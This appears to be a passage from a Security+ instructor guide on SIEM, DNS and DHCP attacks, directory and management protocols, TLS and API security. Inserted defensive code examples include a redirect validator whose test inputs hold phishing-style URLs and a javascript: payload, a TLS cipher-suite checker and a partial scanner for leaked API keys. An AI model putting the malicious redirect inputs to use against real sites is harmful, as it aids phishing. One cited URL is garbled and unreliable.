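subnet_hosts() {
    grep -rhowE '192\.168\.1\.[0-9]{1,3}' "$WORKDIR/logs" | LC_ALL=C sort -u
}

subnet_hosts
```

The counts differ (three, two, one) for the same address because each switch removes one class of false positive; when a search feeds a blocklist or an incident timeline, -F or escaped periods plus -w (or an explicit boundary) is the minimum that makes the result trustworthy.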


Review Activity:
Use of SIEM
Answer the following questions:

1. What is the purpose of SIEM?

Security information and event management (SIEM) products aggregate IDS alerts and host logs from multiple sources, then perform correlation analysis on the observables collected to identify indicators of compromise and alert administrators to potential incidents.

2. What is the difference between a sensor and a collector, in the context of SIEM?

A SIEM collector parses input (such as log files or packet traces) into a standard format that can be recorded within the SIEM and interpreted for event correlation. A sensor collects data from the network media.

3. Does Syslog perform all the functions of a SIEM?

No, syslog allows remote hosts to send logs to a server, but syslog does not aggregate/normalize the log data or run correlation rules to identify alertable events.

4. You are writing a shell script to display the last N lines of a log file at /var/log/audit in a dashboard. What is the Linux command to do this?

tail /var/log/audit -n N, where N is the number of lines to display.

5. What is the principal use of grep in relation to log files?

grep is used to search the content of files.


Lesson 10
Summary
You should be able to use network appliances such as firewalls, proxies, IDS, and SIEM collectors/aggregators to implement secure network designs.

Teaching Tip: Check that students are confident about the content that has been covered. If there is time, re-visit any content examples that they have questions about. If you have used all the available time for this lesson block, note the issues, and schedule time for a review later in the course.

Interaction Opportunity: Optionally, discuss with students how complex security functions can be implemented as either separate or consolidated solutions. Check if students have any positive or negative experience of SIEM.

Guidelines for Implementing Network Security Appliances
Follow these guidelines when you deploy new or upgrade security appliances:

• Identify the security requirements for a network zone or area and determine the appropriate security technology to use:

  • Network firewall to apply an ACL to incoming and outgoing traffic.

  • IDS, IPS, or next-gen firewall to implement signature- and/or behavior-based threat detection.

  • Content filter to control outbound user access to sites and services.

  • UTM to implement multiple controls within a single appliance and reporting interface.

• Assess whether endpoints within the zone should be protected by additional security, such as host-based firewalls, WAFs, or file integrity monitoring.

• Evaluate the commercial model and determine whether proprietary or open source is the best fit for your requirements.

• Document and test the ACL or other security configuration when implementing the device to ensure that it meets the design goals.

• Implement an appropriate method of log and network data collection and aggregation to ensure monitoring and review of security events:

  • Manual methods using syslog and file manipulation tools (head, tail, cat, grep, logger).

  • Security information and event management (SIEM) products.

  • Security orchestration, automation, and response (SOAR) products.

Lesson 10: Implementing Network Security Appliances

Lesson 11
Implementing Secure Network Protocols

LESSON INTRODUCTION
When hosts join a network, they need to be configured with the appropriate settings for that network. The services that provide these settings, such as DHCP and DNS, must be deployed securely. When hosts access data using server applications, such as web/HTTP, email, and VoIP, the communications between clients and servers must be managed using secure versions of the application protocols. You will also need to configure secure protocols that allow users to access networks, host desktops, and appliance configuration interfaces remotely.

Teaching Tip: Moving on from security appliances, this lesson looks at network service infrastructure and security considerations, including access protocols such as addressing (DHCP), name resolution (DNS), applications (web, file transfer, email, and VoIP), remote access/VPN, and remote management.

Lesson Objectives
In this lesson, you will:

• Implement secure network operations protocols.

• Implement secure application protocols.

• Implement secure remote access protocols.


Topic 11A
Implement Secure Network Operations Protocols

EXAM OBJECTIVES COVERED
1.4 Given a scenario, analyze potential indicators associated with network attacks
3.1 Given a scenario, implement secure protocols

Teaching Tip: While they are all application layer protocols in OSI/TCP/IP model terms, this topic focuses on protocols that provide low-level functionality. As well as part of 3.1, this topic covers DNS attacks from 1.4.

Unsecure protocols can be exploited by attackers to compromise data security and systems integrity. In this topic, you will examine some of the protocols and services providing addressing, name resolution, directory services, time synchronization, and monitoring services for network hosts. These network operations protocols might not be as visible as applications such as web and email servers, but they are critical to secure network infrastructure.
Network Address Allocation
Most networks use a mixture of static and dynamic address allocation. Interface addresses for routers, firewalls, and some types of servers are best assigned and managed manually. Other server services and client workstations can be assigned dynamic IP configurations and accessed using name resolution.

Teaching Tip: DHCP can be abused to perform DoS, snooping, or spoofing attacks. DHCP isn't specifically a content example (other than by reference to "network address allocation"), but is important enough to spend some time on.

The Dynamic Host Configuration Protocol (DHCP) provides an automatic method for network address allocation. The key point about DHCP is that only one server should be offering addresses to any one group of hosts. If a rogue DHCP server is set up, it can perform DoS (as client machines will obtain an incorrect TCP/IP configuration) or be used to snoop network information. DHCP starvation is a type of DoS attack where a rogue client repeatedly requests new IP addresses using spoofed MAC addresses, with the aim of exhausting the IP address pool. This makes it more likely that clients seeking an address lease will use the rogue DHCP server.

Enabling the DHCP snooping port security feature on a switch can mitigate rogue DHCP attacks: the switch drops DHCP server messages (offers and acknowledgements) that arrive on any port not configured as trusted. Windows DHCP servers in an AD environment must be authorized in Active Directory before they will lease addresses, and an authorized server logs any traffic it detects from unauthorized DHCP servers. More generally, administration of the DHCP server itself must be carefully controlled and the settings checked regularly. If an attacker compromises the DHCP server, he or she could point network clients to rogue DNS servers and use that as a means to direct users to spoofed websites. Another attack is to redirect traffic through the attacker's machine by changing the default gateway, enabling the attacker to snoop on all network traffic.

Lesson 11: Implementing Secure Network Protocols | Topic 11A

Attacking network address allocation: a script exhausts the DHCP pool while another runs a rogue DHCP server. A third tool operates a rogue DNS to supply spoofed information to clients configured to use the attack machine as a DNS server, via the rogue DHCP configuration.

Domain Name Resolution
The Domain Name System (DNS) resolves fully qualified domain names (FQDNs) to IP addresses. It uses a distributed database system that contains information on domains and hosts within those domains. The information is distributed among many name servers, each of which holds part of the database. The name servers work over port 53. Domain name resolution is a security-critical service and the target of many attacks on both local networks and the Internet.

Teaching Tip: Hopefully students understand the basic function of DNS and the use of resource records. The attacks shown here focus on the registration of domains.

Domain Hijacking
Domain hijacking is an attack where an adversary acquires a domain for a company's trading name or trademark, or perhaps some spelling variation thereof. While there are often trademark and intellectual property laws against doing this, companies need to be careful to renew domain names that they want to continue to use and to protect the credentials used to manage the registration. A domain name registration must be renewed periodically (typically every year).

In a domain hijacking attack, an adversary gains control over the registration of a domain name, allowing the host records to be configured to IP addresses of the attacker's choosing. This might be accomplished by supplying false credentials to the domain registrar when applying for a new domain name or re-registering an existing one. An attacker might also be able to exploit the legitimate account used to manage the domain (via a weak password or malware installed on a client computer) or even to compromise the domain registrar's security procedures in some way (upguard.com/blog/domain-hijacking).

A company whose domain has been hijacked is likely to find that they are locked out of the registrar's management console, or that the domain has been transferred to another registrar, often operating in a different country. The whois command can be used to look up domain registration information to try to detect misuse in other cases.

Uniform Resource Locator (URL) Redirection
A uniform resource locator (URL) is an address for the pages and files published as websites. A URL comprises a FQDN, file path, and often script parameters. URL redirection refers to the use of HTTP redirects to open a page other than the one the user requested. This is often used for legitimate purposes to send the user to a login page or to send a mobile device browser to a responsive version of the site, for instance. If the redirect is not properly validated by the web application, an attacker can craft a phishing link that might appear legitimate to a naive user, such as:

https://trusted.foo/login.php?url="https://tru5ted.foo"

A threat actor could also compromise a web server and add redirects in .htaccess files. A redirect could also be inserted as JavaScript, either through compromising the server or by uploading a script via a poorly validated form.
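One way to validate the url parameter from the login.php example above, as an added shell example that is neither the guide's nor any web framework's own code. It allowlists a same-site path or an exact https host match and rejects everything else, including the look-alike host, a subdomain-suffix trick, a userinfo trick and a protocol-relative URL. The allowed host (trusted.foo), the candidate URLs and the function name are assumptions for the example.

```shell
#!/bin/sh
# Added example (not from the CompTIA guide): server-side validation of a
# redirect target, the check that the login.php example lacks. The allowed
# host, the candidate URLs and the function name are assumptions.

# Prints "allow" when TARGET is safe to redirect to for ALLOWED_HOST (given in
# lower case), otherwise "block". Safe means: a same-site path, or an https URL
# whose host is exactly ALLOWED_HOST. Anything else is rejected by default,
# so this is an allowlist rather than a denylist of known-bad patterns.
redirect_decision() {
    target=$1
    allowed=$2
    # Compare case-insensitively so HTTPS://TRUSTED.FOO is not treated as foreign.
    lower=$(printf '%s' "$target" | tr 'A-Z' 'a-z')
    case $lower in
        *\\*|*' '*)  echo block ;;   # backslash (browsers read /\ as //) or whitespace
        *@*)         echo block ;;   # userinfo trick: https://trusted.foo@evil.example
        //*)         echo block ;;   # protocol-relative URL: //evil.example
        /*)          echo allow ;;   # relative path on the same site
        "https://$allowed"|"https://$allowed/"*|"https://$allowed?"*|"https://$allowed#"*)
                     echo allow ;;   # exact host; trusted.foo.evil.example fails here
        *)           echo block ;;   # other schemes (javascript:, data:), look-alike hosts
    esac
}

# Constructed candidates in the shape of the url= parameter from the text.
for url in '/dashboard' 'https://trusted.foo/account?tab=1' 'https://tru5ted.foo' \
           'https://trusted.foo.evil.example/' 'https://trusted.foo@evil.example' \
           '//evil.example' '/\evil.example' 'javascript:alert(1)'; do
    printf '%-40s %s\n' "$url" "$(redirect_decision "$url" trusted.foo)"
done
```

The matching is deliberately strict: a port suffix (https://trusted.foo:443/) or an http:// scheme is blocked too, and percent-encoded or Unicode look-alike hosts are only safe because they fail the exact comparison rather than because they are recognised. In a real application the same decision belongs in the handler that issues the Location header, and the safest design avoids a user-supplied URL altogether by redirecting to a fixed post-login page.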

Domain Reputation
If your domain, website, or email servers have been hijacked, they are likely to be used for spam or distributing malware. This will lead to complaints and the likelihood of the domain being listed on a blacklist. You should set up monitoring using a site such as talosintelligence.com/reputation_center to detect misuse early.

DNS Poisoning
DNS poisoning is an attack that compromises the process by which clients query name servers to locate the IP address for a FQDN. There are several ways that a DNS poisoning attack can be perpetrated.

Teaching Tip: Most OSes will use HOSTS before any other type of name resolution, though this behavior can be changed. The syllabus isn't specific about client- versus server-side cache poisoning. Server-side is much harder to achieve. One well-known DNS server cache poisoning exploit involves a weakly generated transaction ID, used as a rudimentary form of authentication when a DNS client or server makes a request to another server to resolve a domain name. An attacker able to guess these parameters might be able to reply with a false address (secureworks.com/blog/dns-cache-poisoning).

Man in the Middle
If the threat actor has access to the same local network as the victim, the attacker can use ARP poisoning to respond to DNS queries from the victim with spoofed replies. This might be combined with a denial of service attack on the victim's legitimate DNS server. A rogue DHCP could be used to configure clients with the address of a rogue DNS resolver.

DNS Client Cache Poisoning
Before DNS was developed in the 1980s, name resolution took place using a text file named HOSTS. Each name:IP address mapping was recorded in this file and system administrators had to download the latest copy and install it on each Internet client or server manually. Even though all name resolution now functions through DNS, the HOSTS file is still present and most operating systems check the file before using DNS. Its contents are loaded into a cache of known name:IP mappings and the client only contacts a DNS server if the name is not cached. Therefore, if an attacker is able to place a false name:IP address mapping in the HOSTS file and effectively poison the DNS cache, he or she will be able to redirect traffic. The HOSTS file requires administrator access to modify. In UNIX and Linux systems it is stored as /etc/hosts, while in Windows it is placed in %SystemRoot%\System32\Drivers\etc\hosts.


DNS Server Cache Poisoning
DNS server cache poisoning aims to corrupt the records held by the DNS server itself. This can be accomplished by performing DoS against the server that holds the authorized records for the domain, and then spoofing replies to requests from other name servers. Another attack involves getting the victim name server to respond to a recursive query from the attacking host. A recursive query compels the DNS server to query the authoritative server for the answer on behalf of the client. The attacker's DNS, masquerading as the authoritative name server, responds with the answer to the query, but also includes a lot of false domain:IP mappings for other domains that the victim DNS accepts as genuine. The nslookup or dig tool can be used to query the name records and cached records held by a server to discover whether any false records have been inserted.

DNS Security
DNS is a critical service that should be configured to be fault tolerant. DoS attacks are hard to perform against the servers that perform Internet name resolution, but if an attacker can target the DNS server on a private network, it is possible to seriously disrupt the operation of that network.

Teaching Tip: The majority of Top Level Domains (TLDs) and country code TLDs are signed. Otherwise, adoption of DNSSEC is patchy except in the .gov domain. You can refer students to charts about DNSSEC adoption at internetsociety.org/deploy360/dnssec/statistics.

To ensure DNS security on a private network, local DNS servers should only accept recursive queries from local hosts (preferably authenticated local hosts) and not from the Internet. You also need to implement access control measures on the server, to prevent a malicious user from altering records manually. Similarly, clients should be restricted to using authorized resolvers to perform name resolution.

Attacks on DNS may also target the server application and/or configuration. Many DNS services run on BIND (Berkeley Internet Name Domain), distributed by the Internet Systems Consortium (isc.org). There are known vulnerabilities in many versions of the BIND server, so it is critical to patch the server to the latest version. The same general advice applies to other DNS server software, such as Microsoft's. Obtain and check security announcements and then test and apply critical and security-related patches and upgrades.

DNS footprinting means obtaining information about a private network by using its DNS server to perform a zone transfer (all the records in a domain) to a rogue DNS or simply by querying the DNS service, using a tool such as nslookup or dig. To prevent this, you can apply an Access Control List to prevent zone transfers to unauthorized hosts or domains, to prevent an external server from obtaining information about the private network architecture.

DNS Security Extensions (DNSSEC) help to mitigate against spoofing and poisoning attacks by providing a validation process for DNS responses. With DNSSEC enabled, the authoritative server for the zone creates a package of resource records (called an RRset) signed with a private key (the Zone Signing Key). When another server requests a secure record exchange, the authoritative server returns the package along with its public key, which can be used to verify the signature.

The public zone signing key is itself signed with a separate Key Signing Key. Separate keys are used so that if there is some sort of compromise of the zone signing key, the domain can continue to operate securely by revoking the compromised key and issuing a new one.

Windows Server DNS services with DNSSEC enabled. (Screenshot used with permission from Microsoft.)

The Key Signing Key for a particular domain is validated by the parent domain, which publishes a hash of it as a DS record signed with the parent's own keys. For a top-level domain, that DS record is published in the root zone, and the root zone's Key Signing Key is the trust anchor that validating resolvers are configured with; it is managed by a group of trusted representatives using an M-of-N control scheme at key signing ceremonies. This establishes a chain of trust from the root down to any particular subdomain.

Show Slide(s): Secure Directory Services

Secure Directory Services
A network directory lists the subjects (principally users, computers, and services) and
objects (such as directories and files) available on the network plus the permissions
that subjects have over objects. A directory facilitates authentication and authorization,
and it is critical that it be maintained as a highly secure service. Most directory services
are based on the Lightweight Directory Access Protocol (LDAP), running over port
389. The basic protocol provides no security and all transmissions are in plaintext,
making it vulnerable to sniffing and man-in-the-middle attacks. Authentication
(referred to as binding to the server) can be implemented in the following ways:

• No authentication: anonymous access is granted to the directory.

• Simple bind: the client must supply its distinguished name (DN) and password, but
these are passed as plaintext.

• Simple Authentication and Security Layer (SASL): the client and server negotiate
the use of a supported authentication mechanism, such as Kerberos. The STARTTLS
command can be used to require encryption (sealing) and message integrity
(signing). This is the preferred mechanism for Microsoft's Active Directory (AD)
implementation of LDAP.

• LDAP Secure (LDAPS): the server is installed with a digital certificate, which it uses
to set up a secure tunnel for the user credential exchange. LDAPS uses port 636.

Teaching Tip: Using TLS as part of SASL (STARTTLS) is referred to as opportunistic
encryption.

If secure access is required, anonymous and simple authentication access methods
should be disabled on the server.
Generally two levels of access will need to be granted on the directory: read-only
access (query) and read/write access (update). This is implemented using an access
control policy, but the precise mechanism is vendor-specific and not specified by the
LDAP standards documentation.
Unless hosting a public service, the LDAP directory server should also only be
accessible from the private network. This means that the LDAP port should be blocked
by a firewall from access over the public interface. If there is integration with other
services over the Internet, ideally only authorized IPs should be permitted.

Time Synchronization
Show Slide(s): Time Synchronization

Many applications on networks are time dependent and time critical. These include
authentication and security mechanisms, scheduling applications, and backup
software. The Network Time Protocol (NTP) provides a transport over which to
synchronize these time-dependent applications. NTP works over UDP on port 123.
Top-level NTP servers (stratum 1) obtain the Coordinated Universal Time (UTC) from
a highly accurate clock source, such as an atomic clock. Lower-tier servers then
obtain the UTC from multiple stratum 1 servers and sample the results to obtain an
authoritative time. Most organizations will use one of these stratum 2 servers to obtain
the time for use on the LAN. Servers at lower tiers may then perform the same sort of
sampling operation, adjust for the delay involved in propagating the signal, and provide
the time to clients. Clients themselves usually obtain the time using a modified form of
the protocol (Simple NTP).

NTP has historically lacked any sort of security mechanism, but there are moves
to create a security extension for the protocol called Network Time Security
(blog.cloudflare.com/secure-time/).

Teaching Tip: Most authentication and access control protocols are critically dependent
on time synchronization. Note the impact on forensics and log analysis. If anyone's
confused by the abbreviation UTC, explain that it's language independent (to keep both
the British and the French happy, or unhappy, perhaps).

Simple Network Management Protocol Security

Show Slide(s): Simple Network Management Protocol Security

The Simple Network Management Protocol (SNMP) is a widely used framework for
management and monitoring. SNMP consists of an SNMP monitor and agents.
• The agent is a process (software or firmware) running on a switch, router, server, or
other SNMP-compatible network device.

• This agent maintains a database called a management information base (MIB) that
holds statistics relating to the activity of the device (for example, the number of
frames per second handled by a switch). The agent is also capable of initiating a trap
operation where it informs the management system of a notable event (port failure,
for instance). The threshold for triggering traps can be set for each value. Device
queries take place over port 161 (UDP); traps are communicated over port 162 (also
UDP).

• The SNMP monitor (a software program) provides a location from which network
activity can be overseen. It monitors all agents by polling them at regular intervals
for information from their MIBs and displays the information for review. It also
displays any trap operations as alerts for the network administrator to assess and
act upon as necessary.

Teaching Tip: SNMP is one of those services that should be shut down if it is not being
used. SNMP may run on devices such as switches, firewalls, and printers.

If SNMP is not used, you should remember to change the default configuration
password and disable it on any SNMP-capable devices that you add to the network. If
you are running SNMP v1 or v2c, keep to the following guidelines:
• SNMP community names are sent in plaintext and so should not be transmitted
over the network if there is any risk that they could be intercepted.

• Use difficult-to-guess community names; never leave the community name blank or
set to the default.

• Use Access Control Lists to restrict management operations to known hosts (that is,
restrict to one or two host IP addresses).

• SNMP v3 supports encryption and strong user-based authentication. Instead of
community names, the agent is configured with a list of usernames and access
permissions. When authentication is required, the SNMP message is signed with a
hash of the user's passphrase. The agent can verify the signature and authenticate
the user using its own record of the passphrase.

Review Activity:
Secure Network Operations Protocols
Answer the following questions:

1. What vulnerabilities does a rogue DHCP server expose users to?

Denial of service (providing an invalid address configuration) and spoofing (providing a
malicious address configuration, one that points to a malicious DNS, for instance).

2. Why is it vital to ensure the security of an organization's DNS service?

DNS resolves domain names. If it were to be corrupted, users could be directed to
spoofed websites. Disrupting DNS can also perform denial of service.

3. True or False? The contents of the HOSTS file are irrelevant as long as a
DNS service is properly configured.

False (probably): the contents of the HOSTS file are written to the DNS cache on
startup. It is possible to edit the registry to prioritize DNS over HOSTS, though.

4. What is DNS server cache poisoning?

Corrupting the records of a DNS server to point traffic destined for a legitimate domain
to a malicious IP address.

5. True or false? DNSSEC depends on a chain of trust from the root
servers down.

True.

6. What are the advantages of SASL over LDAPS?

The Simple Authentication and Security Layer (SASL) allows a choice of authentication
providers and encryption (sealing)/integrity (signing) mechanisms. By contrast, LDAPS
uses Transport Layer Security (TLS) to encrypt traffic, but users still authenticate via
simple binding. Also, SASL is the standards-based means of configuring LDAP security.

7. What steps should you take to secure an SNMPv2 service?

Configure strong community names and use access control lists to restrict
management operations to known hosts.

Topic 11B
Implement Secure Application Protocols

EXAM OBJECTIVES COVERED
2.1 Explain the importance of security concepts in an enterprise environment
3.1 Given a scenario, implement secure protocols

Teaching Tip: This topic looks at security and message authentication and
confidentiality for web, file transfer, and communications protocols, such as email and
VoIP. As well as sections of the 3.1 objective, this topic covers TLS and API
considerations from the 2.1 objective.

The network infrastructure of switches, routers, access points, and secure hosts is
implemented for the purpose of running services. The application protocols that
enable web, email, and VoIP require secure configuration too.

Hypertext Transfer Protocol and Web Services
Show Slide(s): Hypertext Transfer Protocol and Web Services

The foundation of web technology is the HyperText Transfer Protocol (HTTP). HTTP
enables clients (typically web browsers) to request resources from an HTTP server. A
client connects to the HTTP server using an appropriate TCP port (the default is port
80) and submits a request for a resource, using a uniform resource locator (URL). The
server acknowledges the request and responds with the data (or an error message).
The response and request formats are defined in an HTTP header. The HTTP payload
is usually used to serve HTML web pages, which are plain text files with coded tags
(HyperText Markup Language) describing how the page should be formatted. A web
browser can interpret the tags and display the text and other resources associated with
the page, such as binary picture or sound files linked to the HTML page.
HTTP also features a forms mechanism (POST) whereby a user can submit data from
the client to the server. HTTP is nominally a stateless protocol; this means that the
server preserves no information about the client during a session. However, the
basic functionality of HTTP servers is often extended by support for scripting and
programmable features (web applications). Servers can also set text file cookies to
preserve session information. These coding features plus integration with databases
increase flexibility and interactivity, but also the attack surface and expose more
vulnerabilities.

Teaching Tip: Stress that HTTP transfers all information in plain text and can be
intercepted by a packet sniffer on the same network segment.

Many argue that HTTP is a stateful protocol. Version 2 of HTTP adds more state-preserving
features (blog.zamicol.com 01 0 is-http -stateful-protocol-application.html).

Show Slide(s): Transport Layer Security

Transport Layer Security
As with other early TCP/IP application protocols, HTTP communications are not
secured. Secure Sockets Layer (SSL) was developed by Netscape in the 1990s to
address the lack of security in HTTP. SSL proved very popular with the industry, and
it was quickly adopted as a standard named Transport Layer Security (TLS). It is
typically used with the HTTP application (referred to as HTTPS or HTTP Secure) but can
also be used to secure other application protocols and as a virtual private networking
(VPN) solution.

Teaching Tip: Point out that SSL can be used with applications other than HTTP.

To implement TLS, a server is assigned a digital certificate signed by some trusted
certificate authority (CA). The certificate proves the identity of the server (assuming that
the client trusts the CA) and validates the server's public/private key pair. The server
uses its key pair and the TLS protocol to agree mutually supported ciphers with the
client and negotiate an encrypted communications session.

HTTPS operates over port 443 by default. HTTPS operation is indicated by using https://
for the URL and by a padlock icon shown in the browser.

It is also possible to install a certificate on the client so that the server can trust the
client. This is not often used on the web but is a feature of VPNs and enterprise
networks that require mutual authentication.

Interaction Opportunity: If there is time, get students to examine the TLS 1.2 and TLS
1.3 handshakes in a packet capture. You can also note the use of about:config to
modify the default version preferences for the browser.

TLS Versions
While the acronym SSL is still used, the Transport Layer Security versions are the only
ones that are safe to use. A server can provide support for legacy clients, but obviously
this is less secure. For example, a TLS 1.2 server could be configured to allow clients to
downgrade to TLS 1.1 or 1.0 or even SSL 3.0 if they do not support TLS 1.2.

A downgrade attack is where a man-in-the-middle tries to force the use of a weak cipher
suite and SSL/TLS version.

TLS version 1.3 was approved in 2018. One of the main features of TLS 1.3 is the
removal of the ability to perform downgrade attacks by preventing the use of unsecure
features and algorithms from previous versions. There are also changes to the
handshake protocol to reduce the number of messages and speed up connections.

Teaching Tip: This Cloudflare blog provides an excellent overview of the problems with
earlier TLS versions for students who want more detail
(blog.cloudflare.com/rfc-8446-aka-tls-1-3/).

Cipher Suites
A cipher suite is the algorithms supported by both the client and server to perform the
different encryption and hashing operations required by the protocol. Prior to TLS 1.3,
a cipher suite would be written in the following form:
ECDHE-RSA-AES128-GCM-SHA256
This means that the server can use Elliptic Curve Diffie-Hellman Ephemeral mode for
session key agreement, RSA signatures, 128-bit AES-GCM (Galois Counter Mode) for
symmetric bulk encryption, and 256-bit SHA for HMAC functions. Suites the server
prefers are listed earlier in its supported cipher list.
TLS 1.3 uses simplified and shortened suites. A typical TLS 1.3 cipher suite appears
as follows:
TLS_AES_256_GCM_SHA384
Only ephemeral key agreement is supported in 1.3 and the signature type is supplied
in the certificate, so the cipher suite only lists the bulk encryption key strength and
mode of operation (AES-256-GCM), plus the cryptographic hash algorithm (SHA-384)
used within the new hash key derivation function (HKDF). HKDF is the mechanism by
which the shared secret established by DH key agreement is used to derive symmetric
session keys.
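The two points above (refusing legacy versions, and reading what a cipher suite name promises) can be checked in code. The following Go program is an added example written for this guide's topic; it is not the guide's own material or a crypto/tls API. ParseSuite splits any OpenSSL-style pre-1.3 name, not only the one shown, into the key agreement, signature, bulk cipher and hash roles the text describes and flags the weak cases (static RSA key transport, anonymous key exchange, RC4/DES/NULL ciphers, MD5), reads the shortened TLS 1.3 form, and HardenedConfig builds a crypto/tls configuration that refuses anything below TLS 1.2. The function names and the weakness categories are choices made for this example.

```go
package main

import (
	"crypto/tls"
	"fmt"
	"strings"
)

// SuiteInfo splits a cipher suite name into the algorithm roles the text
// describes: key agreement, signature, bulk cipher, and the hash used for
// HMAC (TLS 1.2) or HKDF (TLS 1.3).
type SuiteInfo struct {
	KeyExchange string
	Auth        string
	Bulk        string
	Hash        string
	Weak        []string // reasons a server should not offer this suite
}

var kxTokens = map[string]bool{"ECDHE": true, "DHE": true, "ECDH": true, "DH": true, "ADH": true, "AECDH": true}
var authTokens = map[string]bool{"RSA": true, "ECDSA": true, "DSS": true}

// ParseSuite reads the OpenSSL-style pre-1.3 form (ECDHE-RSA-AES128-GCM-SHA256)
// and the shortened TLS 1.3 form (TLS_AES_256_GCM_SHA384). Hypothetical helper
// written for this example.
func ParseSuite(name string) SuiteInfo {
	var info SuiteInfo
	if strings.HasPrefix(name, "TLS_") {
		// TLS 1.3 names only the bulk cipher and the HKDF hash: key agreement is
		// always ephemeral and the signature type comes from the certificate.
		parts := strings.Split(strings.TrimPrefix(name, "TLS_"), "_")
		info.KeyExchange = "ephemeral (ECDHE/DHE via supported_groups)"
		info.Auth = "from certificate"
		info.Bulk = strings.Join(parts[:len(parts)-1], "_")
		info.Hash = parts[len(parts)-1]
		return info
	}
	parts := strings.Split(name, "-")
	i := 0
	if kxTokens[parts[0]] {
		info.KeyExchange, i = parts[0], 1
		if len(parts) > 1 && authTokens[parts[1]] {
			info.Auth, i = parts[1], 2
		} else {
			info.Auth = "none (anonymous)"
		}
	} else {
		// No key-exchange token means static RSA key transport: the server's
		// RSA key both authenticates and encrypts the premaster secret.
		info.KeyExchange, info.Auth = "RSA", "RSA"
	}
	rest := parts[i:]
	if len(rest) == 0 {
		info.Weak = append(info.Weak, "unrecognised suite name")
		return info
	}
	if last := rest[len(rest)-1]; strings.HasPrefix(last, "SHA") || last == "MD5" {
		info.Hash = last
		rest = rest[:len(rest)-1]
	} else {
		info.Hash = "SHA256 (implicit)" // CHACHA20-POLY1305 names omit the hash token
	}
	info.Bulk = strings.Join(rest, "-")
	bulk := strings.ToUpper(info.Bulk)
	switch {
	case strings.Contains(bulk, "NULL"):
		info.Weak = append(info.Weak, "no encryption")
	case strings.Contains(bulk, "RC4"), strings.Contains(bulk, "DES"), strings.Contains(bulk, "EXP"):
		info.Weak = append(info.Weak, "broken or export-grade bulk cipher")
	}
	if info.Hash == "MD5" {
		info.Weak = append(info.Weak, "MD5 MAC")
	}
	if info.KeyExchange == "RSA" {
		info.Weak = append(info.Weak, "no forward secrecy (static RSA key exchange)")
	}
	if info.Auth == "none (anonymous)" {
		info.Weak = append(info.Weak, "unauthenticated key exchange")
	}
	return info
}

// HardenedConfig refuses TLS 1.0/1.1 (Go never speaks SSL 3.0) and offers only
// forward-secret AEAD suites for TLS 1.2; the TLS 1.3 suites are fixed by Go.
func HardenedConfig() *tls.Config {
	return &tls.Config{
		MinVersion: tls.VersionTLS12,
		CipherSuites: []uint16{
			tls.TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384,
			tls.TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384,
			tls.TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305,
			tls.TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305,
			tls.TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256,
			tls.TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256,
		},
	}
}

// InsecureByGo reports whether crypto/tls itself lists the suite ID as insecure,
// a second opinion to run against what a scanner reports a server offering.
func InsecureByGo(id uint16) bool {
	for _, s := range tls.InsecureCipherSuites() {
		if s.ID == id {
			return true
		}
	}
	return false
}

func main() {
	for _, n := range []string{"ECDHE-RSA-AES128-GCM-SHA256", "AES128-SHA", "RC4-SHA", "TLS_AES_256_GCM_SHA384"} {
		fmt.Printf("%-28s %+v\n", n, ParseSuite(n))
	}
	fmt.Println("min version is TLS 1.2:", HardenedConfig().MinVersion == tls.VersionTLS12)
}
```

Note that a name with no leading ECDHE/DHE token (AES128-SHA) is the old static-RSA key transport: it is flagged even though the cipher itself is fine, because a later private-key compromise would expose every recorded session, which is exactly why TLS 1.3 dropped it.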

Teaching Tip: Students may question why the version field reads TLS 1.2. This field is
prone to a compatibility problem when servers cannot identify a new version. As a
workaround, servers supporting TLS 1.3 should use the supported_versions extension
instead.

Viewing the TLS handshake in a Wireshark packet capture. Note that the connection is using TLS 1.3
and one of the shortened cipher suites (TLS_AES_256_GCM_SHA384).

Show Slide(s): API Considerations

API Considerations
HTTP is now used less to serve static web pages, and more to create web applications,
often as part of a cloud product. An enterprise might use both public web applications
over the Internet and private ones. The primary means of configuring and managing a
web application is via its application programming interface (API). For example, an
application might allow a user account to be created via a URL:

https://example.foo/api/users?api_key=123456

The developer uses the POST method to submit data to the URL with the required
parameters coded into the request body, often in JavaScript Object Notation (JSON).

POST /api/users HTTP/1.1
Content-Type: application/json
{
"user": {
"name": "James",
"email": "[email protected]"
}
}

Use of these APIs is authorized via a token or secret key. Effective management of
these API secrets is a key consideration in modern networks, as they have been widely
used to perpetrate various breaches and data thefts. For example, putting the key in
the URL carries a severe risk of exposure. APIs can use more secure authentication
and authorization methods, such as SAML and OAuth, but these still come with
secrets management requirements. Another API consideration is that usage should be
monitored to ensure only authorized endpoints are making transactions.

Teaching Tip: Help students to recognize code samples for when an API is being
used and stress the importance of secrets management. We will revisit this topic in the
lesson on cloud.
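The exposure the text describes (an API key placed in the URL) is visible in the one place a URL always ends up: the access log. The following Go program is an added example, not part of the guide: it scans a few constructed access log lines for credentials carried as query parameters and reports them redacted, and it rebuilds the POST /api/users call from the text with the key moved into an Authorization header so it travels inside the TLS-protected request instead of the URL. The log lines, the key values, the parameter-name list and the use of a Bearer header are all assumptions made for this example.

```go
package main

import (
	"bytes"
	"fmt"
	"net/http"
	"regexp"
	"strings"
)

// Constructed access log lines (combined log format) for the example; every
// address, path and key value here is made up.
const sampleAccessLog = `10.0.0.5 - - [30/Aug/2021:10:01:02 +0000] "POST /api/users?api_key=123456 HTTP/1.1" 201 87
10.0.0.7 - - [30/Aug/2021:10:01:09 +0000] "GET /api/users/42 HTTP/1.1" 200 311
10.0.0.9 - - [30/Aug/2021:10:02:40 +0000] "GET /report?format=json&token=abcdef0123456789 HTTP/1.1" 200 1502
10.0.0.5 - - [30/Aug/2021:10:03:15 +0000] "DELETE /api/users/42?api_key=123456 HTTP/1.1" 204 0`

// secretParam matches query parameters whose names usually carry a credential.
// The name list is an assumption; adapt it to the application being monitored.
var secretParam = regexp.MustCompile(`(?i)[?&](api[_-]?key|access_token|token|secret|password)=([^&\s"]+)`)

// Leak records one logged request that placed a secret in its URL.
type Leak struct {
	Line     int
	Param    string
	Redacted string // first three characters kept so the key owner can identify it
}

// FindSecretsInURLs scans an access log and reports requests whose query string
// carried a credential. Anything found here has already been written to disk
// on the server (and on every proxy or CDN in the path) and should be rotated.
func FindSecretsInURLs(accessLog string) []Leak {
	var leaks []Leak
	for n, line := range strings.Split(accessLog, "\n") {
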